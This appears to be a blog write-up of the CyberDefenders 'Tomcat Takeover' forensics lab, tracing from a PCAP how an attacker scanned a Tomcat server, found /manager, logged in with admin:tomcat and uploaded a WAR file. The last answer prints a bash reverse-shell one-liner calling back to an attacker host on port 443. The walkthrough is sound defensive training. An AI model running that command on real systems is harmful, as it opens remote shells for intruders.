Tomcat Takeover Lab
CyberDefenders Network Forensics Lab
Scenario
The SOC team has identified suspicious activity on a web server within the company’s intranet. To better understand the situation, they have captured network traffic for analysis. The PCAP file may contain evidence of malicious activities that led to the compromise of the Apache Tomcat web server. Your task is to analyze the PCAP file to understand the scope of the attack.
Question 1
Given the suspicious activity detected on the web server, the PCAP file reveals a series of requests across various ports, indicating potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
Answer 1
Looking rather deep into the PCAP file, it was clear that the IP address 14.0.0.120 was responsible for the scanning behavior. They were pinging different ports from their a their local port numbered 51985. To see if they could obtain a response.
Press enter or click to view image in full size
Question 2
Based on the identified IP address associated with the attacker, can you identify the country from which the attacker’s activities originated?
Answer 2
A quick look up of the IP address seemed to indicate their location being in China.
Press enter or click to view image in full size
Question 3
From the PCAP file, multiple open ports were detected as a result of the attacker’s active scan. Which of these ports provides access to the web server admin panel?
Answer 3
Looking towards the end of the port scanning revealed that there was a HTTP request made to port 8080.
Press enter or click to view image in full size
Question 4
Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
Answer 4
Looking at the various GET requests that were pushed by the attacker. It was clear after the webpage had fully loaded, they started to use gobuster to enumerate to discover files and folders within the web directory.
Press enter or click to view image in full size
Question 5
After the effort to enumerate directories on our web server, the attacker made numerous requests to identify administrative interfaces. Which specific directory related to the admin panel did the attacker uncover?
Answer 5
There were a few standard directories that were discovered, but the one that caught my eye and the attackers eye would be /manager.
Press enter or click to view image in full size
Question 6
After accessing the admin panel, the attacker tried to brute-force the login credentials. Can you determine the correct username and password that the attacker successfully used for login?
Answer 6
After looking for a HTTP POST request coming from the attackers IP address. It was clear that the credentials used where admin:tomcat.
Press enter or click to view image in full size
Question 7
Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
Answer 7
Using the tool NetworkMiner, I was able to find a rather suspicious file close to the end of the PCAP file. After the attacker had obtained access to the system. Named: JXQOZY.war
Press enter or click to view image in full size
I also found the file within Wireshark:
Press enter or click to view image in full size
Question 8
After successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
Answer 8
After looking for the reverse shell, I found the command that was run a couple of times to obtain persistence in the machine. They spawn a shell in bash.
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
Last updated